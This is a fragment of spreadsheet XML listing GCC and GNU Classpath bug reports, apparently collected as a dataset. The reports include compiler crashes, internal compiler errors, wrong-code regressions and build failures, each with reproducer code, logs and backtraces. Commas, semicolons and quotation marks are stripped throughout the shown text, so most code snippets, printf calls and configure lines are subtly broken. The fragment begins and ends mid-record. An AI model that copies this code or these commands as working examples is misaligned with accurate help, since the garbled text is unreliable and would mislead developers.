echo -e '\n_ZNK6clover6detail11basic_rangeINS_13adaptor_rangeIZNS_6kernel6launchERNS_13command_queueERKSt6vectorImSaImEESA_SA_EUlmE_JRS8_EEENS0_16iterator_adaptorISB_JN9__gnu_cxx17__normal_iteratorIPmS8_EEEEESJ_EcvT_IS6_IPjSaISN_EEvEEv'|./test-demangle 
Segmentation fault
[...]
#44 0x000000000040cb94 in d_print_comp (dpi=0x7fffffffa190 options= dc=) at cp-demangle.c:5594
#45 0x0000000000408fa8 in d_print_comp_inner (dpi=0x7fffffffa190 options=275 dc=) at cp-demangle.c:4544
#46 0x000000000040cb94 in d_print_comp (dpi=0x7fffffffa190 options= dc=) at cp-demangle.c:5594
#47 0x0000000000408fe8 in d_print_comp_inner (dpi=0x7fffffffa190 options=275 dc=) at cp-demangle.c:4742
#48 0x000000000040afcf in d_print_comp (dc= options=275 dpi=0x7fffffffa190) at cp-demangle.c:5594
#49 d_print_conversion (dc=0x7fffffffb018 options=275 dpi=0x7fffffffa190) at cp-demangle.c:5995
#50 d_print_comp_inner (dpi=0x7fffffffa190 options=275 dc=0x7fffffffb018) at cp-demangle.c:5212
#51 0x000000000040cb94 in d_print_comp (dpi=0x7fffffffa190 options= dc=) at cp-demangle.c:5594
#52 0x0000000000408fa8 in d_print_comp_inner (dpi=0x7fffffffa190 options=275 dc=) at cp-demangle.c:4544
#53 0x000000000040cb94 in d_print_comp (dpi=0x7fffffffa190 options= dc=) at cp-demangle.c:5594
#54 0x0000000000408fe8 in d_print_comp_inner (dpi=0x7fffffffa190 options=275 dc=) at cp-demangle.c:4742
#55 0x000000000040afcf in d_print_comp (dc= options=275 dpi=0x7fffffffa190) at cp-demangle.c:5594
#56 d_print_conversion (dc=0x7fffffffb018 options=275 dpi=0x7fffffffa190) at cp-demangle.c:5995
#57 d_print_comp_inner (dpi=0x7fffffffa190 options=275 dc=0x7fffffffb018) at cp-demangle.c:5212
[...]
#79591 0x0000000000400fdd in main (argc= argv=0x7fffffffd7a8) at test-demangle.c:317</t>
  </si>
  <si>
    <t>GCC-52846</t>
  </si>
  <si>
    <t>[F2008] Support submodules</t>
  </si>
  <si>
    <t>Fortran 2008 added submodules support.
That's a tracker bug with the main intention to add a link to the following bugs. Those contain a change which won't work with submodules. Thus some special submodule check has to be inserted for PR 52751 and PR 40973.</t>
  </si>
  <si>
    <t>CLASSPATH-27147</t>
  </si>
  <si>
    <t>JTextField: switching editable state resets background color</t>
  </si>
  <si>
    <t>The following can be seen in the Swing Activity board: When a JTextField which has a custom background color and you switch the editable state the background color seems to be reset to white.</t>
  </si>
  <si>
    <t>GCC-69422</t>
  </si>
  <si>
    <t>Unexpected result with allocatable character type component</t>
  </si>
  <si>
    <t>With the current svn master branch the following code prints out nothing for 'test result':
    module funcs
    implicit none
    Type T
    character(LEN=:) allocatable :: source
    end type T
    type TPointer
    	Type(T) pointer :: P
    end type TPointer
    end module
    program Test1
    use funcs
    Type(TPointer) :: X
    allocate(X%P)
    X%P%Source = 'test string'
    print * 'test result = ' X%P%Source
    end program Test1
This may be a regression from earlier 6.0 commits but not sure.</t>
  </si>
  <si>
    <t>GCC-45041</t>
  </si>
  <si>
    <t>'gcc -E -o -' creates ./-.exe on cygwin</t>
  </si>
  <si>
    <t>For a while the autoconf testsuite failed on cygwin because asking gcc to run the preprocessor with an explicit output of '-' for stdout instead created a text file ./-.exe containing the preprocessor output [1].
While the autoconf workaround was simple (remove '-o -' since -E already implies a default of stdout) this anomaly in cygwin should be fixed [2].
[1] http://lists.gnu.org/archive/html/bug-autoconf/2010-07/msg00071.html
[2] http://cygwin.com/ml/cygwin/2010-07/msg00482.html</t>
  </si>
  <si>
    <t>ericb</t>
  </si>
  <si>
    <t>GCC-69164</t>
  </si>
  <si>
    <t>[6 Regression] ICE in create_tmp_var at gimple-expr.c:468</t>
  </si>
  <si>
    <t>trunk r232077 i686-linux-gnu works with -O0
reduced test case:
class A {
public:
  class B {
    friend A
    B() {}
    bool : 1
  }
  B m_fn1() {
    B r
    return r
  }
}
class C {
public:
  class D {
  public:
    D(C *p1) : m_label(p1-&gt;m_assembler.m_fn1()) {}
    A::B m_label
  }
  A m_assembler
}
enum YarrCharSize {}
class F : C {
  D generateDotStarEnclosure_findEOLLoop = this
public:
  F(int YarrCharSize) {}
}
YarrCharSize a
int b
void fn1() { F(b a) }
$ g++ -c -march=i686 -g -O3 -std=gnu++11  -Wno-invalid-offsetof YarrJIT.ii
YarrJIT.ii: In constructor 'C::D::D(C*)':
YarrJIT.ii:33:23: internal compiler error: in analyze_access_subtree at tree-sra.c:2340
 void fn1() { F(b a) }
                       ^
0x876134e analyze_access_subtree
        ../../src/gcc/tree-sra.c:2339
0x87610c7 analyze_access_subtree
        ../../src/gcc/tree-sra.c:2312
0x87669dd analyze_access_trees
        ../../src/gcc/tree-sra.c:2402
0x87669dd analyze_all_variable_accesses
        ../../src/gcc/tree-sra.c:2655
0x8766dad perform_intra_sra
        ../../src/gcc/tree-sra.c:3631
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-40237</t>
  </si>
  <si>
    <t>Internal compiler error building Cuba library</t>
  </si>
  <si>
    <t>http://www.feynarts.de/cuba/
Cuba 1.6 from 10 of may 2009
========================
# ./configure
========================
checking for gcc... gcc
checking for C compiler default output file name... a.out
checking whether the C compiler works... yes
checking whether we are cross compiling... no
checking for suffix of executables... 
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking for g77... g77
checking whether we are using the GNU Fortran 77 compiler... yes
checking whether g77 accepts -g... yes
checking for ranlib... ranlib
checking for a BSD-compatible install... /usr/bin/ginstall -c
checking for an ANSI C-conforming const... yes
checking for inline... inline
checking for long double with more range or precision than double... yes
checking for powl... yes
checking for erf... yes
checking for variable-size arrays... yes
checking for qmake... qmake
configure: creating ./config.status
config.status: creating makefile
config.status: creating config.h
======================
# make
======================
gcc -O3 -fomit-frame-pointer -ffast-math -DHAVE_CONFIG_H -I./src/common -I. -I. -I./src/vegas -c -o Vegas.o ./src/vegas/Vegas.c
ar rv libcuba.a Vegas.o
ar: creating libcuba.a
a - Vegas.o
rm -f Vegas.o
gcc -O3 -fomit-frame-pointer -ffast-math -DHAVE_CONFIG_H -I./src/common -I. -I. -I./src/vegas -DUNDERSCORE -c -o Vegas_.o ./src/vegas/Vegas.c
ar rv libcuba.a Vegas_.o
a - Vegas_.o
rm -f Vegas_.o
gcc -O3 -fomit-frame-pointer -ffast-math -DHAVE_CONFIG_H -I./src/common -I. -I. -I./src/vegas -DLONGLONGINT -c -o llVegas.o ./src/vegas/Vegas.c
ar rv libcuba.a llVegas.o
a - llVegas.o
rm -f llVegas.o
gcc -O3 -fomit-frame-pointer -ffast-math -DHAVE_CONFIG_H -I./src/common -I. -I. -I./src/vegas -DLONGLONGINT -DUNDERSCORE -c -o llVegas_.o ./src/vegas/Vegas.c
ar rv libcuba.a llVegas_.o
a - llVegas_.o
rm -f llVegas_.o
gcc -O3 -fomit-frame-pointer -ffast-math -DHAVE_CONFIG_H -I./src/common -I. -I. -I./src/suave -c -o Suave.o ./src/suave/Suave.c
ar rv libcuba.a Suave.o
a - Suave.o
rm -f Suave.o
gcc -O3 -fomit-frame-pointer -ffast-math -DHAVE_CONFIG_H -I./src/common -I. -I. -I./src/suave -DUNDERSCORE -c -o Suave_.o ./src/suave/Suave.c
ar rv libcuba.a Suave_.o
a - Suave_.o
rm -f Suave_.o
gcc -O3 -fomit-frame-pointer -ffast-math -DHAVE_CONFIG_H -I./src/common -I. -I. -I./src/suave -DLONGLONGINT -c -o llSuave.o ./src/suave/Suave.c
ar rv libcuba.a llSuave.o
a - llSuave.o
rm -f llSuave.o
gcc -O3 -fomit-frame-pointer -ffast-math -DHAVE_CONFIG_H -I./src/common -I. -I. -I./src/suave -DLONGLONGINT -DUNDERSCORE -c -o llSuave_.o ./src/suave/Suave.c
ar rv libcuba.a llSuave_.o
a - llSuave_.o
rm -f llSuave_.o
gcc -O3 -fomit-frame-pointer -ffast-math -DHAVE_CONFIG_H -I./src/common -I. -I. -I./src/divonne -c -o Divonne.o ./src/divonne/Divonne.c
./src/divonne/Explore.c: In function 'Explore':
./src/divonne/Explore.c:17: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [libcuba.a(Divonne.o)] Error 1
*****************************************
Removing -O option do solves the problem.
*****************************************</t>
  </si>
  <si>
    <t>GCC-61210</t>
  </si>
  <si>
    <t>[4.10 regression] bootstrap failure with clang</t>
  </si>
  <si>
    <t>For months I've been using clang and clang++ to bootstrap trunk gcc.
Works faster than gcc and the warning messages are interesting -&gt;
In the last couple of weeks since wide-int code went into gcc trunk
this has broke. 
clang suggested using flag -fheinous-gnu-extensions but that didn't help.
Here is 20140514 failing to bootstrap
Comparing stages 2 and 3
warning: gcc/cc1-checksum.o differs
warning: gcc/cc1plus-checksum.o differs
Bootstrap comparison failure!
gcc/simplify-rtx.o differs
gcc/fold-const.o differs
gcc/tree-ssa-ccp.o differs
make[2]: *** [compare] Error 1
make[2]: Leaving directory `/home/dcb/gcc/working'
make[1]: *** [stage3-bubble] Error 2
make[1]: Leaving directory `/home/dcb/gcc/working'
make: *** [bootstrap] Error 2
Thu 15 May 18:28:51 BST 2014
Configure line is
../src/trunk/configure --prefix=/home/dcb/gcc/results --enable-checking=release --enable-languages=cc++fortran --disable-werror CC=clang -g -O2 -Wall -fheinous-gnu-extensions CXX=clang++ -g -O2 -Wall -fheinous-gnu-extensions
and bootstrap line is
make BOOT_CFLAGS='-g -O3' CFLAGS_FOR_TARGET='-g -O3' -j 2 bootstrap</t>
  </si>
  <si>
    <t>GCC-69515</t>
  </si>
  <si>
    <t>partial specialization of variable templates is broken</t>
  </si>
  <si>
    <t>Reduced from http://stackoverflow.com/q/35027853/2756719:
struct A { A(int = 0) }
template class meow
template A foo
template A foo&gt; = 1
auto
auto
Output:
/tmp/ccpeDea7.s: Assembler messages:
/tmp/ccpeDea7.s:24: Error: symbol `foo' is already defined
Additionally attempting to explicitly instantiate 'foo' using the partial specialization causes a bogus error:
template A foo  // OK
template A foo&gt; // Error
prog.cc:11:12: error: 'foo' is not a static data member of a class template
 template A foo&gt;
            ^~~~~~~~~~~~~~</t>
  </si>
  <si>
    <t>GCC-49691</t>
  </si>
  <si>
    <t>ICE  in cp_parser_late_return_type_opt at cp/parser.c:15562</t>
  </si>
  <si>
    <t>I've hit the following ICE when I try to build kdelibs-4.6.5 with the latest gcc:
/var/tmp/portage/kde-base/kdelibs-4.6.5/work/kdelibs-4.6.5/kate/view/kateviewinternal.cpp: In member function â€˜void KateViewInternal::updateBracketMarkAttributes()â€™:
/var/tmp/portage/kde-base/kdelibs-4.6.5/work/kdelibs-4.6.5/kate/view/kateviewinternal.cpp:1865:27: internal compiler error: in cp_parser_late_return_type_opt at cp/parser.c:15562
This points to commit 0499ac793b687:
Author: jason 
Date:   Wed Jun 29 21:19:31 2011 +0000
        DR 1207
        PR c++/49003
        * cp-tree.h (struct saved_scope): Add x_current_class_ptr
        x_current_class_ref.
        (current_class_ptr current_class_ref): Use them.
        * decl.c (build_this_parm): Handle getting the class type.
        * parser.c (cp_parser_late_return_type_opt): Set up 'this'
        for use within the trailing return type.
    git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@175671
The preprocessed file is attached.</t>
  </si>
  <si>
    <t>GCC-7639</t>
  </si>
  <si>
    <t>[mainline regression] g++ 3.3 ICE in operand_subword</t>
  </si>
  <si>
    <t>g++ crashes compiling the (invalid) code below.
$ g++ -c  crash1.cc 
crash1.cc: In instantiation of `ACE_Cleanup_Adapter':
crash1.cc:11:   instantiated from here
crash1.cc:8: error: `ACE_Cleanup_Adapter::object_' has 
   incomplete type
crash1.cc:1: error: forward declaration of `struct ACE_Null_Mutex'
crash1.cc: In member function `TYPE&amp; ACE_Cleanup_Adapter::object() [with 
   TYPE = ACE_Null_Mutex]':
crash1.cc:11:   instantiated from here
crash1.cc:7: internal compiler error: Internal compiler error in 
   operand_subword at emit-rtl.c:1546
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$
Release:
3.3 20020819 (experimental)
Environment:
System: Linux karma 2.4.9-13 #1 Tue Oct 30 20:11:04 EST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../egcs/configure --prefix=/usr/local/egcs --enable-threads=posix --enable-long-long : (reconfigured)  : (reconfigured)
How-To-Repeat:
-------------------------------------------------------
class ACE_Null_Mutex
template 
struct ACE_Cleanup_Adapter
{
  TYPE &amp;object ()
  { return object_ }
  TYPE object_
}
template class ACE_Cleanup_Adapter
-------------------------------------------------------
Unformatted:
 SEND-PR: Leave Confidential as no all GCC PRs are public.
 SEND-PR: critical     GCC is completely not operational no work-around known.
 SEND-PR: serious      GCC is not working properly a work-around is possible.
 SEND-PR: non-critical Report indicates minor problem.
 SEND-PR: medium       The problem should be solved in the next release.
 SEND-PR: low          The problem should be solve in a future release.
 SEND-PR: doc-bug          The documentation is incorrect.
 SEND-PR: accepts-illegal  GCC fails to reject erroneous code.
 SEND-PR: rejects-legal    GCC gives an error message for correct code.
 SEND-PR: wrong-code       The machine code generated by gcc is incorrect.
 SEND-PR: ice-on-legal-code   GCC gives an Internal Compiler Error (ICE)
 SEND-PR:                     for correct code
 SEND-PR: ice-on-illegal-code GCC gives an ICE instead of reporting an error
 SEND-PR: pessimizes-code     GCC misses an important optimization opportunity
 SEND-PR: sw-bug              Software bug of some other class than above
 SEND-PR: change-request      A feature in GCC is missing.
 SEND-PR: support             I need help with gcc.</t>
  </si>
  <si>
    <t>GCC-19454</t>
  </si>
  <si>
    <t>[4.0 Regression] bad code generated with gcc.c-torture/execute/bf64-1.c at -O1</t>
  </si>
  <si>
    <t>Here is a slightly modified version of bf64-1.c with print statments:
struct tmp
{
  long long int pad : 12
  long long int field : 52
}
struct tmp2
{
  long long int field : 52
  long long int pad : 12
}
struct tmp  sub  (struct tmp  xtmp)
struct tmp2 sub2 (struct tmp2 xtmp2)
struct tmp
sub (struct tmp xtmp)
{
  xtmp.field |= 0x0008765412345678LL
  return xtmp
}
struct tmp2
sub2 (struct tmp2 xtmp2)
{
  xtmp2.field |= 0x0008765412345678LL
  return xtmp2
}
main()
{
  struct tmp xtmp = {0x123 0xFFF000FFF000FLL}
  struct tmp2 xtmp2 = {0xFFF000FFF000FLL 0x123}
  xtmp = sub (xtmp)
  xtmp2 = sub2 (xtmp2)
  printf(%lld\n xtmp.pad)
  printf(%lld\n xtmp.field)
  printf(%lld\n xtmp2.pad)
  printf(%lld\n xtmp2.field)
  exit (0)
}
With -O0 it prints:
291
-738197547393
291
-738197547393
At -O1 it prints:
291
1479942473249059
291
-738197547393
This bug happens on IA64 HP-UX (with -O1 and in 32 or 64 bit mode) but not on
IA64 Linux.  I tracked the start of failure to the following patch but was
unable to figure out what the exact problem is.
2004-09-03  Richard Henderson  
        PR middle-end/9997
        * cfgexpand.c (LOCAL_ALIGNMENT): Provide default.
        (STACK_ALIGNMENT_NEEDED FRAME_GROWS_DOWNWARD): Likewise.
        (struct stack_var EOC stack_vars stack_vars_alloc stack_vars_num
        stack_vars_sorted stack_vars_conflict stack_vars_conflict_alloc
        frame_phase get_decl_align_unit add_stack_var triangular_index
        resize_stack_vars_conflict add_stack_var_conflict
        stack_var_conflict_p add_alias_set_conflicts stack_var_size_cmp
        union_stack_vars partition_stack_vars dump_stack_var_partition
        expand_one_stack_var_at expand_stack_vars expand_one_stack_var
        expand_one_static_var expand_one_hard_reg_var
        expand_one_register_var expand_one_error_var defer_stack_allocation
        expand_one_var expand_used_vars_for_block clear_tree_used): New.
        (expand_used_vars): Rewrite.
        * Makefile.in (cfgexpand.o): Update dependencies.</t>
  </si>
  <si>
    <t>GCC-6218</t>
  </si>
  <si>
    <t>[alpha osf1 4.0] Build hangs</t>
  </si>
  <si>
    <t>The compile of gcc hangs while compiling parse.c for some sort of java part of gcc.
The original make tries to build it with -O2 but that was left churning for 14 hours without returning.
Original:
gcc -c  -DIN_GCC     -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes   -DHAVE_CONFIG_H    -I. -Ijava -I../../gcc -I../../gcc/java  -I../../gcc/config -I../../gcc/../include ../../gcc/java/parse.c -o java/parse.o
Modified:
gcc -c  -DIN_GCC     -g -O -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes   -DHAVE_CONFIG_H    -I. -Ijava -I../../gcc -I../../gcc/java  -I../../gcc/config -I../../gcc/../include ../../gcc/java/parse.c -o java/parse.o
The modified one compiles in a reasonable amount of time (20 seconds or so).
This problem seems to appear with the stock configure/make without any special options. I was able to get around it by stopping the build going into the gcc directory running my modified command with -O instead of -O2 and then going back to my objdir and running make again.
-Michael
Release:
gcc-3.0.4
Environment:
Dec-UX v.4.0f
Currently installed compiler:
Reading specs from /usr/local/lib/gcc-lib/alphaev6-dec-osf4.0f/2.95/specs
gcc version 2.95 19990728 (release)</t>
  </si>
  <si>
    <t>GCC-12763</t>
  </si>
  <si>
    <t>Error with tiny correct program (copy constructor with temporary problem?)</t>
  </si>
  <si>
    <t>struct X { 
  X(int) {} 
} 
int main() { 
  X(X(0)) 
  X x(0) 
} 
&gt; g++ Temporary.cpp 
Temporary.cpp: In function `int main()': 
Temporary.cpp:6: error: `X' undeclared (first use this function) 
Temporary.cpp:6: error: (Each undeclared identifier is reported only 
   once for each function it appears in.) 
Temporary.cpp:6: error: parse error before `(' token 
Commenting out any of the two lines in main and it compiles. 
Error occurs also with version 3.2.1. 
&gt; g++ -v 
Reading specs from 
/home/kullmann/csoliver/GCC/gcc-3.3.1/lib/gcc-lib/i686-pc-linux-gnu/3.3.1/specs 
Configured with: /home/kullmann/csoliver/GCC/gcc-3.3.1/configure 
--enable-threads=posix --enable-long-long 
--prefix=/home/kullmann/csoliver/GCC/gcc-3.3.1 
--with-local-prefix=/home/kullmann/csoliver/GCC/Include_3.3.1/ 
--enable-languages=cc++ --disable-nls --enable-shared 
Thread model: posix 
gcc version 3.3.1</t>
  </si>
  <si>
    <t>GCC-43760</t>
  </si>
  <si>
    <t>[4.6 regression] New test failures</t>
  </si>
  <si>
    <t>On Linux/ia64 revision 158361 gave:
FAIL: 23_containers/deque/operators/1.cc (test for excess errors)
FAIL: gfortran.dg/array_constructor_23.f  -O2  (test for excess errors)
FAIL: gfortran.dg/array_constructor_24.f  -O2  (test for excess errors)
Revision 158345 is OK.</t>
  </si>
  <si>
    <t>GCC-47635</t>
  </si>
  <si>
    <t>[C++0x] ICE on invalid code in constructor_name_p at cp/name-lookup.c:1809</t>
  </si>
  <si>
    <t>in the preprocessed source there's a syntax error:
'LibraryVersion::version() const {'
instead of:
'LibraryVersion Library::version() const {'
and the 'g++ heshvpUtils.ii -c -std=gnu++0x' ices on this line.</t>
  </si>
  <si>
    <t>GCC-28250</t>
  </si>
  <si>
    <t>[4.2 regression] ICE with invalid catch</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE on mainline:
=================================
template void foo()
{
  try {}
  catch (int(0)) {}
}
=================================
  bug.cc: In function 'void foo()':
  bug.cc:4: error: expected `)' before numeric constant
  bug.cc:4: internal compiler error: tree check: expected tree that contains 'decl common' structure have 'error_mark'  in pushdecl_maybe_friend at cp/name-lookup.c:574
  Please submit a full bug report [etc.]
Will post a patch soon.</t>
  </si>
  <si>
    <t>GCC-18162</t>
  </si>
  <si>
    <t>[4.0 Regression] c-parse.y:1409.17: parse error unexpected : expecting  or |</t>
  </si>
  <si>
    <t>After last chnages in c-parse.y bootstrap current CVS mainline GCC terminated 
with errors:
---8X----------------------------------
echo '/*WARNING: This file is automatically generated!*/' &gt;tmp-c-parse.y
sed -e /^@@ifobjc.*//^@@end_ifobjc.*/d \
    -e /^@@ifc.*/d -
e /^@@end_ifc.*/d /home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/c-parse.in 
&gt;&gt;tmp-c-parse.y
/bin/sh /home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/../move-if-change tmp-c-
parse.y c-parse.y
bison  -o c-parse.c c-parse.y
c-parse.y:1409.17: parse error unexpected : expecting  or |
c-parse.y:1411.3-22: $2 of `designator' has no declared type
c-parse.y:1411.3-32: invalid $ value
c-parse.y:1411.3-32: $4 of `designator' has no declared type
c-parse.y:1415.3-22: $2 of `designator' has no declared type
gmake[2]: [c-parse.c] Error 1 (ignored)
[skiped]
gcc -c   -g -DENABLE_CHECKING -DENABLE_ASSERT_CHECKING -DIN_GCC   -W -Wall -
Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-
definition -fno-common -Wno-error  -DHAVE_CONFIG_H    -I. -I. -
I/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc -
I/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/. -
I/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/../include -I./../intl -
I/home/wanderer/pkg/build/gcc/src/gcc/gcc/gcc/../libcpp/include -
I/usr/local/include  c-parse.c -o c-parse.o
gcc: c-parse.c: No such file or directory
gcc: No input files specified
gmake[2]: *** [c-parse.o] Error 1
gmake[2]: Leaving directory `/usr/home/wanderer/pkg/build/gcc/obj/gcc'
gmake[1]: *** [stage1_build] Error 2
gmake[1]: Leaving directory `/usr/home/wanderer/pkg/build/gcc/obj/gcc'
gmake: *** [bootstrap] Error 2
---X8----------------------------------
~/gcc &gt; bison --version
bison (GNU Bison) 1.75
Written by Robert Corbett and Richard Stallman.
I think problem related to patch 
http://gcc.gnu.org/ml/gcc-cvs/2004-10/msg01420.html</t>
  </si>
  <si>
    <t>GCC-58563</t>
  </si>
  <si>
    <t>[4.9 Regression] [c++11] ICE calling invalid destructor</t>
  </si>
  <si>
    <t>The following code snippet (compiled with -std=c++0x) triggers an ICE since GCC 4.4.0:
==============================
template void foo()
{
  enum E {}
  E().E::~T()
}
==============================
bug.cc: In function 'void foo()':
bug.cc:4:11: error: 'enum foo()::E' is not a class
   E().E::~T()
           ^
bug.cc:4:11: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in cp_parser_lookup_name at cp/parser.c:21759
0xcda4a9 tree_class_check_failed(tree_node const* tree_code_class char const* int char const*)
        ../../gcc/gcc/tree.c:9227
0x6322f5 tree_class_check
        ../../gcc/gcc/tree.h:2732
0x6322f5 cp_parser_lookup_name
        ../../gcc/gcc/cp/parser.c:21759
0x64f3a0 cp_parser_class_name
        ../../gcc/gcc/cp/parser.c:18736
0x64abb4 cp_parser_unqualified_id
        ../../gcc/gcc/cp/parser.c:4883
0x64b3f3 cp_parser_id_expression
        ../../gcc/gcc/cp/parser.c:4647
0x65b8de cp_parser_postfix_dot_deref_expression
        ../../gcc/gcc/cp/parser.c:6368
0x643569 cp_parser_postfix_expression
        ../../gcc/gcc/cp/parser.c:6031
0x64615d cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:7009
0x646d3f cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:7701
0x6471ff cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:7937
0x649063 cp_parser_expression
        ../../gcc/gcc/cp/parser.c:8099
0x64985e cp_parser_expression
        ../../gcc/gcc/cp/parser.c:8138
0x64985e cp_parser_expression_statement
        ../../gcc/gcc/cp/parser.c:9429
0x63f187 cp_parser_statement
        ../../gcc/gcc/cp/parser.c:9280
0x64046e cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:9552
0x6405b6 cp_parser_compound_statement
        ../../gcc/gcc/cp/parser.c:9506
0x65196b cp_parser_function_body
        ../../gcc/gcc/cp/parser.c:18318
0x65196b cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc/gcc/cp/parser.c:18354
0x6529af cp_parser_function_definition_after_declarator
        ../../gcc/gcc/cp/parser.c:22338
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-32498</t>
  </si>
  <si>
    <t>declaration of '__end' as array of voids declaration of '__dso_handle' as array of voids</t>
  </si>
  <si>
    <t>Configure string:
$ /n/12/rask/src/all/configure --target=powerpc-unknown-eabisim --with-newlib --enable-sim --disable-libffi --disable-gdb --disable-nls
Build fails:
libtool: compile:  /home/rask/build/gcc-powerpc-unknown-eabisim/./gcc/xgcc -B/home/rask/build/gcc-powerpc-unknown-eabisim/./gcc/ -nostdinc -B/home/rask/build/gcc-powerpc-unknown-eabisim/powerpc-unknown-eabisim/newlib/ -isystem /home/rask/build/gcc-powerpc-unknown-eabisim/powerpc-unknown-eabisim/newlib/targ-include -isystem /n/12/rask/src/all/newlib/libc/include -B/home/rask/build/gcc-powerpc-unknown-eabisim/powerpc-unknown-eabisim/libgloss/rs6000 -L/home/rask/build/gcc-powerpc-unknown-eabisim/powerpc-unknown-eabisim/libgloss/libnosys -L/n/12/rask/src/all/libgloss/rs6000 -B/usr/local/powerpc-unknown-eabisim/bin/ -B/usr/local/powerpc-unknown-eabisim/lib/ -isystem /usr/local/powerpc-unknown-eabisim/include -isystem /usr/local/powerpc-unknown-eabisim/sys-include -L/home/rask/build/gcc-powerpc-unknown-eabisim/./ld -DHAVE_CONFIG_H -I/n/12/rask/src/all/boehm-gc/include -fexceptions -Iinclude -I././targ-include -I.//libc/include -O2 -g -O2 -fexceptions -Iinclude -I././targ-include -I.//libc/include -c /n/12/rask/src/all/boehm-gc/allchblk.c -o allchblk.o
In file included from /n/12/rask/src/all/boehm-gc/include/private/gc_priv.h:70
                 from /n/12/rask/src/all/boehm-gc/allchblk.c:19:
/n/12/rask/src/all/boehm-gc/include/private/gcconfig.h:861: error: declaration of '__end' as array of voids
/n/12/rask/src/all/boehm-gc/include/private/gcconfig.h:861: error: declaration of '__dso_handle' as array of voids
make[3]: *** [allchblk.lo] Error 1
make[3]: Leaving directory `/home/rask/build/gcc-powerpc-unknown-eabisim/powerpc-unknown-eabisim/boehm-gc'</t>
  </si>
  <si>
    <t>GCC-10664</t>
  </si>
  <si>
    <t>GCC incorrectly reorders loads and stores for a powerpc-unknown-eabi target when optimizing</t>
  </si>
  <si>
    <t>GCC targeted for powerpc-unknown-eabi produces incorrect code when the attached small source code file is compiled with the command line powerpc-unknown-eabi-gcc -S -Wall -O3 bug.c -o bug.s. GCC compiles the source without any error or warning messages. The issue concerns the assembler output corresponding to the first two statements of the following function. The function is here for illustration purposes complete source is in the attachment.
void FreeMsg(void ** ppMsg)
{
  msgBufHd_t * pMsgHd
  /* Get the message pointer and clear the user variable */
  pMsgHd = *((msgBufHd_t **) ppMsg)
  *ppMsg = 0
  /* Step back to see the private header */
  pMsgHd--
  /* Must have been freed by the owner */
  if (pMsgHd-&gt;owner != CurrentThread()) {
    panic()
  }
}
With optimization setting -O3 GCC incorrectly reorders the assignment (stw) before reading the previous value (lwz):
FreeMsg:
        stwu 1-24(1)
        mflr 6
        li 50
        stw 628(1)
        stw 50(3)     &lt;-- *ppMsg = 0
        lwz 40(3)      TOO LATE
        stw 2912(1)
        addi 294-4
        bl CurrentThread
        ...
The same problem can be seen when optimizing with -O2. Reducing optimization to -O1 or not optimizing at all solves the problem:
FreeMsg:
        stwu 1-24(1)
        mflr 0
        stw 2912(1)
        stw 028(1)
        lwz 290(3)     &lt;-- Read *ppMsg
        li 00
        stw 00(3)      &lt;-- *ppMsg = 0
        ...
The problem seems to be very sensitive to the contents of the function and comes and goes when you make small and seemingly insignificant changes to the function.
Release:
3.2.3
Environment:
Output of powerpc-unknown-eabi-gcc -v:
---
Reading specs from /usr/local/xgcc/3.2.3/lib/gcc-lib/powerpc-unknown-eabi/3.2.3/specs
Configured with: /root/software/installed/gcc-3.2.3/configure --target=powerpc-unknown-eabi --prefix=/usr/local/xgcc/3.2.3 --program-prefix=ppc-unknown-eabi-
Thread model: single
gcc version 3.2.3
How-To-Repeat:
Compile the attached file bug.c with gcc targeted for powerpc-unknown-eabi using the following command line:
powerpc-unknown-eabi-gcc -S -Wall -O3 bug.c -o bug.s. Examining the assembler code reveals the problem.</t>
  </si>
  <si>
    <t>toni.kettula</t>
  </si>
  <si>
    <t>GCC-40669</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5 Regression] ICE in gimple_assign_set_rhs1 from eliminate_tail_call</t>
  </si>
  <si>
    <t>double _Complex
test (int d int t double *x double *y double *z int n
      double _Complex (*fnp) (double))
{
  int m = n / 2
  double min = y[t] max = z[t] med = x[m * d + t]
  double _Complex result = 0.0
  if (n == 0)
    return 0.0
  if (min &gt; med)
    result += test (d (t + 1) % d x + (m + 1) * d y z n - m - 1 fnp)
  else if (max &lt; med)
    result += test (d (t + 1) % d x y z m fnp)
  else
    {
      result += fnp (y[0] + x[m])
      result += test (d (t + 1) % d x + (m + 1) * d y z n - m - 1 fnp)
    }
  return result
}
ICEs at -O2 -ffast-math on x86_64-linux in 4.4/4.5 with:
x.i: In function 'test':
x.i:22:1: internal compiler error: in gimple_assign_set_rhs1 at gimple.h:1683
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
and in 4.3 with:
x.i: In function 'test':
x.i:4: internal compiler error: in set_ssa_val_to at tree-ssa-sccvn.c:1071
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Compiles just fine with 4.1 and 4.2.</t>
  </si>
  <si>
    <t>GCC-55320</t>
  </si>
  <si>
    <t>Invalid delete with throwing copy-c'tor passed to std::function</t>
  </si>
  <si>
    <t>Created attachment 28682
Example program
The example program attached compiles w/o warnings and crashes with an invalid delete when executed.
$ gcc --version
gcc (Debian 4.7.2-4) 4.7.2
$ cat main.cpp
#include 
#include 
